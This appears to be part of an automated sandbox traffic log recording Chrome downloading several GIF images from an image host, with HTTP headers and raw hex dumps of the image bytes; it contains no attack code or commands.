                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: ca 88 ef 64 7c c1 45 2a 89 8b ee 00 2d 5c 2e f5 b6 af fb be 2f fc 62 ee e7 de a7 19 64 69 d1 96 c0 fd e6 ef 97 96 00 12 68 c1 22 cc af 6a f8 ec 0c 2c c2 13 74 82 fe da ef fe 26 b0 3e 3c 81 ef 2e 6d 42 cc 6f b5 0e 2f 02 4f 30 fe 2a 70 09 f4 ee fc 26 ef 34 7e 2e 0e d4 6f 05 53 f0 01 e3 af 0c 34 41 06 a7 86 00 23 ea 0b 18 b0 05 87 f0 b5 76 42 13 1c ea e7 c6 6f 46 49 ac 82 5e 2a 92 dc 89 5f 92 ac e1 fa 51 dd bd cc 44 71 0f 64 64 02 6f fd 80 12 04 60 e4 de ea 5a b8 ff 85 67 b0 af 0c 37 b1 13 3f 31 14 17 d0 09 5b a9 16 a4 00 12 ec 6e 0f 98 41 13 d8 6d 09 9b 30 04 cf c0 29 68 81 19 74 42 f1 72 2b 8a 69 41 03 df ed 58 7c f1 29 68 80 19 e4 6e 19 77 c2 c6 9e 80 c0 02 70 00 7f 31 0e 54 71 19 5f 6b 0a 3c 01 0e d4 71 0c df 31 04 9f 80 18 93 b1 ee 6e ac 06 a4 b1 03 47
                                                                                                                                                          Data Ascii: d|E*-\./bdih"j,t&><.mBo/O0*p&4~.oS4A#vBoFI^*_QDqddo`Zg7?1[nAm0)htBr+iAX|)hnwp1Tq_k<q1nG


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          20192.168.2.549734103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:33 UTC627OUTGET /uploads/1fca8c8f6e46d22afdc2c135ec9cac1d.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:34 UTC346INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:33 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 46296
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:23:43 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bf3f-b4d8"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:33 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:34 UTC16038INData Raw: 47 49 46 38 39 61 fc 03 46 00 f7 ff 00 38 49 48 f6 ed ee f1 e6 e6 ee f0 f3 89 bd e3 89 a4 d4 ed ee f2 f5 f2 f3 7b 81 8b e5 e6 e6 e5 e7 ee 6b 7a 82 db e4 f0 53 71 b3 77 b0 e0 65 72 71 27 35 3a fb fa f7 ed e7 eb 73 93 ca ef ea ee ac ba d2 99 b5 d2 8e 99 a2 85 92 96 c2 dc f4 f4 f6 f8 c4 ca cc 1d 27 2c fd fc fb d5 d9 d9 81 bb e2 b6 bf be f7 f8 fa e6 ea f1 c6 cd d9 c3 d3 ec a1 a6 a5 eb 6b 66 e1 e6 f2 ce d3 d7 f9 f9 fa b5 c5 db ac b5 b7 8b c4 e4 b5 d4 eb f6 f3 f3 e0 24 25 df e2 e4 fa f6 f5 f5 ee f1 81 87 81 9b a6 aa f8 f2 ef f0 f3 f5 6a 96 cd af ce e6 94 a9 d4 b7 bb c2 97 9c a4 c8 d7 e9 9e c5 e8 f1 f3 f6 4f 58 63 ef ea ec bc c3 c6 91 ba e2 a6 ab b2 ef eb e7 a0 c9 e5 f3 f5 f7 bf d0 e5 fd fc fc 65 6d 77 e6 ea ed f6 f6 f7 6a 8b c5 b0 ce e7 85 8b 93 80 96 ca 63 88
                                                                                                                                                          Data Ascii: GIF89aF8IH{kzSqwerq'5:s',kf$%jOXcemwjc
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 2e 62 1b b5 c0 53 2f fa 22 0e 80 01 80 61 06 16 b0 21 a3 0a 02 3b a8 80 0a 1c 41 32 72 c6 8c 4c 81 23 46 e2 14 28 80 06 ae 0a 42 31 22 7e 7c 80 07 00 a4 26 68 23 08 a0 00 89 2a 1c c1 a9 80 c7 a1 40 c6 6d 1c c2 d4 03 c2 29 9c 3b d2 00 3c 86 46 1c 84 14 08 a4 d4 0c 68 42 10 84 5b 1d 4c 8c c1 d8 6a 51 05 01 e7 0c dc c8 fd ea 6e d0 c2 02 38 d5 55 42 c0 18 ac c1 1a 8c c1 18 d4 02 28 70 c2 03 54 42 d1 18 4d 45 ce 0f 46 c6 43 3c 18 41 33 38 9d 29 30 01 14 3c 81 5c c1 41 7b 4a c1 11 44 9d 10 7c c2 30 04 82 4a ca d5 38 d8 ff 01 13 7c cd 2f 78 82 0f ec d5 2c 78 43 13 14 00 61 f5 2b 3d f8 82 22 f8 40 13 24 c2 2c c4 01 d8 f4 c0 30 78 51 db 40 81 d4 e5 ab d3 14 5d de 49 ce de e5 82 13 fc 80 5e 34 02 5e d4 85 5e 7c 6c c7 da 85 c7 36 c2 05 48 40 1f b0 65 4b 24 c3 f6 f4
                                                                                                                                                          Data Ascii: .bS/"a!;A2rL#F(B1"~|&h#*@m);<FhB[LjQn8UB(pTBMEFC<A38)0<\A{JD|0J8|/x,xCa+="@$,0xQ@]I^4^^|l6H@eK$
                                                                                                                                                          2024-06-09 22:40:34 UTC13874INData Raw: 4a af d3 2b 0c f8 3a 0c 50 84 36 48 ba 21 08 82 28 d0 03 69 40 00 d3 5a 84 68 98 c9 bc 5a 01 24 b8 85 24 20 49 67 d5 03 27 a0 07 48 b8 80 c7 ba 00 af d3 83 0b 20 07 5d 18 49 0e 70 02 09 c0 83 3e 50 85 7a 20 03 b6 0a 82 14 08 81 14 d8 c9 45 58 02 29 08 02 00 98 03 32 18 82 a7 89 02 1d 90 01 69 98 83 64 f0 00 18 78 84 ae d4 01 29 90 02 b3 e4 07 67 48 4b 17 10 3d 7b 48 cb 01 14 06 47 78 83 d5 73 06 70 90 87 b8 cc d8 b0 20 4c ad 18 00 19 c0 3d ec 0a b0 97 cd 3d 10 0b b0 ee f1 87 b0 e0 b0 01 84 22 cd 31 0c c2 30 0c d7 ff 11 86 eb 22 87 c8 0c 3f 28 39 01 28 e1 cc 93 00 11 cf 1c 12 ce 4c da a3 05 91 a7 85 da 0f 39 da e9 a3 4c a2 e5 05 ab 45 89 d7 d4 da ad 55 00 e6 63 be fc 94 80 c0 f8 b0 10 e3 8b 0b fa 4d c1 18 ce 09 ca bf c0 88 20 f8 e4 59 b1 68 cc f7 03 20 02
                                                                                                                                                          Data Ascii: J+:P6H!(i@ZhZ$$ Ig'H ]Ip>Pz EX)2idx)gHK={HGxsp L=="10"?(9(L9LEUcM Yh


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          21192.168.2.549736103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:34 UTC627OUTGET /uploads/d88fe311d70531966d7d8cfbf0e4c955.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:34 UTC348INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:34 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 213703
                                                                                                                                                          Last-Modified: Fri, 15 Mar 2024 03:25:38 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "65f3bfb2-342c7"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:34 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:34 UTC16036INData Raw: 47 49 46 38 39 61 fc 03 46 00 f7 ff 00 86 a4 ff 55 6f af b6 c4 d3 2c 54 ae ba c7 d5 3d c2 9e 79 9c fe d6 d8 fe b4 c3 cf c4 ce db 45 ab b9 59 89 ea 9e aa b8 cd d9 f7 39 69 cb f1 ce b3 d6 dd e5 b3 b3 fb d7 ac 90 77 77 fb c9 d3 de b6 ca ec 98 72 5a 68 64 62 bc cb d7 96 a8 cb f0 d9 ce 78 a7 fa d7 d9 dc 77 98 d9 d7 9f 73 ec f3 f9 af 87 6f 83 9d d1 4b 78 d8 92 92 fb b7 ca fc f6 e5 d8 71 87 b9 91 90 90 ce b7 ac 66 8d fe be cc db a5 b7 e6 9b b3 ff 98 ab d6 a4 ba fe a5 b6 dc f3 f4 f4 ac c3 f9 cf ca b7 da e3 ec 59 85 ff 4c 48 f7 b6 b0 94 89 98 b6 65 8d da ec eb ec 2e ef 55 87 a3 d9 7a 97 cc fb fc fd 58 85 de 75 8a c6 39 61 bb 11 35 8f db e6 f4 6e 94 ff 6b 92 dc 91 ac fe 6d ad d8 c8 c8 ca 8c a3 c8 ae 98 8c e4 b5 8d 49 79 ff bb c2 99 eb ee fd e5 ed fc 4b 99 cb ca cf
                                                                                                                                                          Data Ascii: GIF89aFUo,T=yEY9iwwrZhdbxwsoKxqfYLHe.UzXu9a5nkmIyK
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 93 36 a9 e2 1d 29 12 64 c0 89 4c a8 d5 98 e3 3c c0 d5 56 e4 c3 3c 7c c5 36 94 82 0c b8 41 0f c4 11 18 ec c1 15 70 80 2d e4 80 ab 41 c0 11 1c c1 b8 c0 80 3f 20 56 ff bd 40 03 a4 01 1f 5c 80 be b8 83 30 68 9b 2d b4 01 23 f8 41 1b 31 02 07 6c c2 32 70 c1 11 c8 cb 0d 14 03 16 60 81 2d c0 01 1c 08 c2 22 3c c1 26 94 0c 22 24 81 0d a8 02 a2 3a db 09 98 82 2c 80 c3 05 f0 41 0b fc 1a 2d 70 00 17 24 41 12 1c c1 19 cc c0 07 60 80 6c d8 60 57 24 12 58 e0 60 be 2d 12 5e de 4c 0f ec 25 5f 22 26 63 98 45 3f 08 26 61 16 01 00 00 40 11 0c 01 0d 20 66 c3 b1 c0 0e 42 80 0c c1 67 65 90 e4 3c 50 e9 89 94 9a d5 94 0f 10 0c 00 21 0c 80 b5 ce 81 09 20 c1 7d c8 03 27 96 98 33 e0 86 b5 02 d3 00 f0 40 1b 9a 0d 1c 3a 4b 3d 81 eb 00 e0 cd 00 fc 80 43 fd c0 00 cc 27 bc 9e 42 d4 0d ff
                                                                                                                                                          Data Ascii: 6)dL<V<|6Ap-A? V@\0h-#A1l2p`-"<&"$:,A-p$A`l`W$X`-^L%_"&cE?&a@ fBge<P! }'3@:K=C'B
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: aa ea c3 c7 dd 30 6b 57 b0 82 2f 1c e4 b7 47 be cf 0a e4 c0 37 82 40 ed 29 aa 42 32 f9 12 21 0a b7 c1 a4 c2 db 99 22 5e 07 a2 e5 7e 38 d8 b1 f2 58 30 78 b9 dc 8f c7 21 41 c1 b0 1a f3 40 1c 4c bb be 88 79 ff 60 09 a1 54 9c 2d f5 e5 89 10 05 5c 21 00 8b 89 97 cc e4 92 64 c7 1e ce f5 b0 8a af e7 67 0c fb 80 cf 71 e0 01 4b f2 51 8f 82 dc 6d 3e cb fd 42 8a 05 72 dd dc e6 c3 c5 2e ee 0f a4 d9 eb c7 fb cc 78 c7 18 71 6e 8e 11 22 87 38 5c c4 29 a2 6e af 40 84 7b bd 26 78 8a 08 72 88 b1 aa 09 a2 20 90 e2 67 c9 4d 1e 08 64 e1 e9 56 24 df 67 9e 70 4e 72 a5 e8 e7 bd ee 75 59 d8 52 84 e3 47 0e 63 b5 eb 55 c0 c0 4d b8 a6 65 57 14 e6 ec aa 59 20 ca 56 5e 60 fc 65 6d 4b 95 d7 db df a6 94 b2 2d 4c 14 dc 89 40 04 1d 80 c5 3f 2a 70 ee 10 3c e3 dd cf 40 b5 08 04 2d 90 06 88
                                                                                                                                                          Data Ascii: 0kW/G7@)B2!"^~8X0x!A@Ly`T-\!dgqKQm>Br.xqn"8\)n@{&xr gMdV$gpNruYRGcUMeWY V^`emK-L@?*p<@-
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: c9 6d b4 5c e2 4a 89 d8 a1 9b 5d 99 2c f8 87 d1 11 5d ce ad 0f 33 cd 5c 45 fd df 4c 12 de 01 a6 8f 69 73 84 d0 8d db 79 05 89 88 55 54 5c 7a 55 4c f9 58 d3 8a 8c a6 15 ba 47 7d da 7f b8 01 4c 15 5f 5e fd 87 bf fa 86 0e 78 3b 06 2e 61 06 de 30 df 7d 87 04 98 05 36 78 14 08 0e 07 02 f8 06 bd 55 54 13 b5 50 1b ce 80 b6 a2 61 67 98 23 ba a3 b0 3b ec 38 15 98 85 e0 0b d8 26 80 5d 0c 30 c8 68 d8 01 ce 8c 55 13 36 e1 70 ba 05 28 8e 62 29 9e e2 28 36 d5 00 20 98 95 29 df 68 4d 5f 59 d1 62 84 58 5f 11 71 d9 1b 30 a4 49 a0 d0 1b 88 55 13 c8 87 ff 64 9c 5f 7b f0 54 fb 8d 08 86 cd 5f 75 31 23 07 48 55 02 06 60 99 15 e0 20 b8 63 26 12 de 80 2d 5a ef b1 c6 5b 00 d6 12 06 a8 97 ed 07 28 e0 60 45 05 82 1b 18 62 99 bd 14 b2 bd 5a 96 a1 5f f5 6d e2 8c 25 64 03 9e 38 bf c2
                                                                                                                                                          Data Ascii: m\J],]3\ELisyUT\zULXG}L_^x;.a0}6xUTPag#;8&]0hU6p(b)(6 )hM_YbX_q0IUd_{T_u1#HU` c&-Z[(`EbZ_m%d8
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: ba b8 8b bb ff 10 0f f9 90 0f b8 01 b9 a0 db 98 03 01 05 95 4b bb 92 b2 a8 92 b2 03 40 20 b5 82 d0 90 6e 69 95 5f b0 0b 9a 88 04 2e 4a ae 61 6b 10 5f fb 10 5d bb 85 d6 ea a3 dc 6b b6 19 ff 40 77 f3 fa 53 61 3b 3a cd 2b 07 66 40 91 0d 01 0b 9a c8 74 76 b1 10 6a 94 90 e1 19 19 64 32 b7 c2 4b 11 40 71 be 8a bb 0e 93 ab b8 84 60 0f af 8b 10 8b 7b 35 91 3b 0b fd 0b 04 97 7b 14 04 71 14 e1 5b 97 8a 2b ad 10 1c c1 12 2c ad 85 cb 03 4d c0 03 8a 6b 02 03 47 70 11 41 bb b6 bb b8 a6 1b c2 22 dc 8c 3f 8b 69 e9 83 03 a7 90 90 66 a0 b8 10 fb 0f d0 0a 04 7c 69 b8 c7 fb b4 56 d9 0f ae 9b a0 ab d8 97 ca 57 54 73 79 bf 05 91 a7 07 21 99 62 ba 10 40 7c 81 7c 6b a4 4f 6b a1 d3 8a 83 73 a0 73 4a 2c 10 be 62 98 20 77 c4 fa 33 10 92 19 07 bd a1 10 ae c2 97 43 dc 04 b8 1a 05 fc
                                                                                                                                                          Data Ascii: K@ ni_.Jak_]k@wSa;:+f@tvjd2K@q`{5;{q[+,MkGpA"?if|iVWTsy!b@||kOkssJ,b w3C
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: 72 a4 7f dc a5 eb 3f f4 71 12 31 3f 23 80 8c a8 41 c7 bd 29 b3 cc 49 fa db 50 3c 38 e7 ac 33 ce 18 8d d9 ae c7 07 f8 a3 ae b5 10 7b 9c a4 8e 1a da eb 67 1e fb a9 c4 ae c7 fc c0 0b 41 64 04 cd b4 92 d5 8f cd 24 ec 01 1e e3 d6 52 d2 4a db 3b 43 64 2d 0d 18 f6 d9 68 5f c8 01 3d 6c b7 cd f6 33 6c f7 f9 73 b7 13 80 fb cc dd 77 df 23 37 d0 fe 60 ff 70 cf 98 fe 7c eb cf 1e cc aa 86 8f b3 06 41 fb 1a 6c b1 55 4b 91 a2 50 d7 f0 63 7b 06 c5 e8 8f b6 1e d7 7d 05 89 16 dd 86 b9 bb 0d 1b ac 50 8a a4 93 3e d0 6d 6d a6 ae fa ea 11 34 2c 40 aa 69 17 48 90 3c 58 0a dc 2d bc 30 18 2b 90 b0 44 62 b3 30 b7 75 0b 7d 31 91 ee 4e fc a3 7d 60 87 fd 3b e8 b1 eb 06 c3 33 b9 2a ea 7b b9 41 cb 59 10 6e 50 07 3d b4 41 3b 77 9f f3 45 3e 43 9d 24 35 22 21 d4 f4 48 22 c5 38 77 b7 37 52
                                                                                                                                                          Data Ascii: r?q1?#A)IP<83{gAd$RJ;Cd-h_=l3lsw#7`p|AlUKPc{}P>mm4,@iH<X-0+Db0u}1N}`;3*{AYnP=A;wE>C$5"!H"8w7R
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: 87 b0 6c 9c 30 02 47 e4 aa 1a 04 66 68 28 5d 04 b9 90 69 7b bc 10 db 7d 76 03 a4 64 40 01 ce 9b 00 09 60 bd cb 6b a4 0e 9b 9d ef 03 b6 62 a7 bd db 4b b4 5a e8 56 ca 39 be ce 50 be 40 99 91 10 15 bb 6f 15 b2 5b 67 b8 a7 eb 93 2f 9b 82 af 84 00 e2 68 7e 50 15 1d f7 80 2d 02 ab 64 18 50 0f 46 97 14 01 8c ae a0 1b ba 0d 56 c2 5a 7c 31 49 16 4a c5 87 3b fd c4 88 0f bc 14 8e 95 c4 ae fb b1 be e9 68 1d 1c 9c 7b 4c 99 a5 73 0f 23 4c 78 3e 69 46 87 29 99 ee ff 92 7e 58 0c 4b 04 c0 a3 78 a5 77 43 f8 b6 70 39 97 71 89 00 d4 30 0d 6d 23 0f d3 90 b6 64 70 32 64 f0 bc 2a 00 44 3f 1c c4 06 39 c4 4f b5 bb 26 e4 be df 87 58 4e a9 50 81 4c 99 9c da c4 87 a9 9e 89 99 be 20 2b 0d 55 dc be 25 5a 6b 60 d6 6e ab d4 c5 c6 f7 c5 d0 81 b7 4f 16 45 49 71 c6 d7 81 c6 1c f3 a5 88 c8
                                                                                                                                                          Data Ascii: l0Gfh(]i{}vd@`kbKZV9P@o[g/h~P-dPFVZ|1IJ;h{Ls#Lx>iF)~XKxwCp9q0m#dp2d*D?9O&XNPL +U%Zk`nOEIq
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: 32 f8 82 d7 31 c5 45 82 8c 1e 40 91 a0 50 0d 23 fc 1d 0b dc 83 ff 83 80 04 48 8a f0 5b 1c 6d 01 c4 47 4a 3b c6 fc b4 b3 48 d3 0a 61 ca 40 94 aa e7 ac 18 dd b1 0e 80 bc 4f 9f 08 99 df db 09 a3 21 c8 c4 68 88 32 09 9c 8b ab 42 19 41 3e 7d c2 c7 85 3a ca 24 bd 3d 67 28 9c 2a 45 16 eb f0 02 db 8b 52 64 69 9b bc 49 2c 7c 52 24 df 80 bb 68 a8 c8 a5 58 54 a2 70 a2 12 a1 9c a7 b0 b7 cf ac c1 95 10 54 99 78 3e e1 50 20 eb 80 81 bd 22 00 d2 41 bb f5 e4 96 b2 2b 1e 9c d0 2f 14 ed 43 81 60 9a c5 8c 09 46 72 1f 40 ed d7 54 b5 41 69 00 26 a8 d8 d6 2d 55 43 69 9d 98 0b 9a 25 51 45 30 58 0b 89 e5 d8 d4 d0 41 11 ff 27 79 87 4e 53 18 1a fc 2e 83 c4 43 8f c5 c3 60 fb 8b 04 f8 4f f7 82 a4 a0 70 cb 54 65 a4 75 14 3d 1e 41 57 84 20 2a a8 90 3e 95 5b 8e 86 b8 82 83 8d 25 5c c5
                                                                                                                                                          Data Ascii: 21E@P#H[mGJ;Ha@O!h2BA>}:$=g(*ERdiI,|R$hXTpTx>P "A+/C`Fr@TAi&-UCi%QE0XA'yNS.C`OpTeu=AW *>[%\
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: b5 7f 05 38 71 86 d3 88 d4 d2 8a 5e 90 80 5d 68 51 72 38 8d dd 44 87 5c 27 70 7f 21 5d f5 36 2f c9 a3 5f dd 48 2f fe d0 59 1a 84 61 cd 77 72 1a 54 40 bd c7 5b 4f c8 34 73 f1 47 68 23 8b b4 58 8b e1 b1 21 48 15 89 42 e6 82 9b b5 8f 8a c4 48 d6 76 35 3b c1 40 b8 d2 8b 10 64 86 bd 44 75 80 86 40 d1 40 00 09 30 03 ec f1 90 10 19 91 10 69 6d 92 26 91 16 69 91 10 80 01 47 d8 1d 35 a5 68 ad d8 1e 35 d5 52 b7 d4 2a 3c d5 10 25 49 1e b7 38 8d dc b6 8b fe b0 11 60 b7 7f f4 81 0f a9 e6 39 e9 96 07 04 c0 86 5f ff 06 93 8b e4 14 38 69 5c 4c 07 8d d2 98 59 4c d3 80 d8 06 81 64 e2 24 57 02 1a 70 f8 70 4d 14 46 e9 c1 8e 4f 18 36 2a b9 82 65 f6 8e 96 08 16 d6 d6 4c 9b b8 95 5f f1 07 44 49 95 ef 47 58 4d c4 8f 9b 55 6c ab d6 92 b6 82 49 3c 31 86 18 e1 09 fe d0 43 86 83 4f
                                                                                                                                                          Data Ascii: 8q^]hQr8D\'p!]6/_H/YawrT@[O4sGh#X!HBHv5;@dDu@@0im&iG5h5R*<%I8`9_8i\LYLd$WppMFO6*eL_DIGXMUlI<1CO
                                                                                                                                                          2024-06-09 22:40:35 UTC16384INData Raw: c1 20 2c 2c 59 ec 3c 99 c0 07 c7 93 33 6e b4 91 27 fa 96 bf 30 3d 9f 42 00 a3 8b 47 a3 8b 43 78 62 1f 87 1b 9a d7 63 a9 73 73 29 5c 3b 1f a6 8a a0 d2 09 b1 73 83 8b 3c 20 43 08 b3 2c 21 5a b9 57 43 c7 7e f4 04 02 e8 36 2a e1 98 1e a8 2f e4 b8 07 bf b8 c3 ff c5 38 8e b3 12 1b c6 2b a6 8f 8a 39 71 5b 14 23 0b c4 42 1c 1d bf e8 8b 95 fb 94 05 9c c2 2a 81 c4 0a c1 3f 10 22 83 40 a0 c4 ea c0 c4 f0 d2 1a 0a 89 95 95 b1 0c 51 34 9b fa 99 40 86 9b a5 10 69 22 db e3 97 f7 c8 22 16 f1 bc f3 59 c5 20 ab 90 13 59 b7 cb 12 89 62 c1 99 86 01 24 b1 d3 15 df 51 08 08 24 c1 c9 f1 0c 7f 20 93 f3 a2 40 d4 81 99 c0 a3 9a 67 3c 4b 01 a0 90 b8 b3 46 0a 88 46 75 e3 c5 b7 b3 11 37 20 40 7a 2c ac 21 ec b1 c6 02 4a d8 49 88 1e f0 02 69 5b ae 0f 9b 96 6a 28 1d 9d 6c a1 81 cb c8 af
                                                                                                                                                          Data Ascii: ,,Y<3n'0=BGCxbcss)\;s< C,!ZWC~6*/8+9q[#B*?"@Q4@i""Y Yb$Q$ @g<KFFu7 @z,!JIi[j(l


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          22192.168.2.549738103.85.191.784434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:40:34 UTC604OUTGET /uploads/hg128-526.gif HTTP/1.1
                                                                                                                                                          Host: www.image110.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: http://www.bitdefenderlogin.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:40:34 UTC346INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:40:34 GMT
                                                                                                                                                          Content-Type: image/gif
                                                                                                                                                          Content-Length: 57501
                                                                                                                                                          Last-Modified: Mon, 29 Apr 2024 10:08:12 GMT
                                                                                                                                                          Connection: close
                                                                                                                                                          ETag: "662f718c-e09d"
                                                                                                                                                          Expires: Tue, 09 Jul 2024 22:40:34 GMT
                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          2024-06-09 22:40:34 UTC16038INData Raw: 47 49 46 38 39 61 80 00 0e 02 f7 ff 00 e5 e8 e7 0c 6b 59 ef cc 16 d6 97 07 2c 6f 52 16 1a 1f f3 e5 79 c7 c7 c7 68 8c 50 10 98 83 b9 cd ca 28 32 48 0c 73 61 57 6d 3e a8 c3 bc 95 71 5c f3 d5 35 9b ad 6e b0 b0 50 92 95 2f f3 e8 87 8f ad a8 cd b4 28 f3 d8 44 4a 76 49 d3 a8 0e d0 a8 92 8e 91 8d f3 df 66 52 85 51 0b 4b 3b b0 8a 70 10 73 61 fb ff fe 68 8d 67 10 82 6b a5 bb b5 ee c9 b4 f7 ee 9c 51 87 73 9b a5 52 f6 d9 c9 d3 ce 6f ef cf 21 ba bb bb cf d2 8c 10 59 48 fa e5 d6 10 72 5c b1 a8 34 90 a7 97 eb c5 48 d1 c5 56 33 3f 5a 10 6b 59 0c 69 54 d7 df dd 10 7c 68 d3 b7 a7 0c 89 74 85 97 49 0c 61 4d ae a7 91 10 63 51 0c 71 5d 2c 83 6c f3 eb 93 6f 86 36 10 79 64 ea ac 05 ed cd 56 2d 74 64 47 76 69 6a 94 8b 8d 90 73 d1 c7 b0 db e9 ed b3 90 13 e0 63 65 f6 f6 f6 ac 97
                                                                                                                                                          Data Ascii: GIF89akY,oRyhP(2HsaWm>q\5nP/(DJvIfRQK;psahgkQsRo!YHr\4HV3?ZkYiT|htIaMcQq],lo6ydV-tdGvijsce
                                                                                                                                                          2024-06-09 22:40:34 UTC16384INData Raw: 81 4e a7 34 0d 10 00 7f e0 5d 07 04 35 4a ab 40 2d 24 0f 08 20 00 52 3f 75 4c f3 ad d4 3e 94 8b 1c b0 b2 4e 6a 4b cd 88 12 70 01 07 70 35 0d c4 0c ca b8 40 18 e8 42 57 97 35 57 4b 00 94 ac 2a da 6e b5 59 97 35 0f 74 03 50 f8 90 31 10 80 0a 70 b5 5d 77 b5 0a 10 75 67 1a 10 0f b4 b5 5d d7 42 d5 58 cf 09 a0 80 04 74 6b 04 94 35 0d 14 36 0d d8 75 f5 16 76 b7 d6 42 6b 2e 52 e1 56 f2 1c 6c c3 38 d4 c3 fd ad 4d 38 f0 00 20 70 ff 81 16 70 01 20 90 f2 45 82 03 0f e8 82 67 83 f6 69 77 f6 50 4f c6 bc f8 82 04 7c 76 67 c3 f6 69 4b 40 4e dc 00 4e 20 81 2e c4 36 6a c3 b6 16 20 41 3b 76 49 04 a4 b6 70 9b 73 5b 26 c8 30 1d 08 6c 47 00 6d a0 c0 69 23 40 ff 92 a7 56 84 02 fd 79 52 a7 62 f5 47 a7 8e 1c f0 c0 05 00 c2 76 5f 00 0f bc d0 90 68 37 77 03 02 0d a0 00 61 e7 f6 76
                                                                                                                                                          Data Ascii: N4]5J@-$ R?uL>NjKpp5@BW5WK*nY5tP1p]wug]BXtk56uvBk.RVl8M8 pp EgiwPO|vgiK@NN .6j A;vIps[&0lGmi#@VyRbGv_h7wav
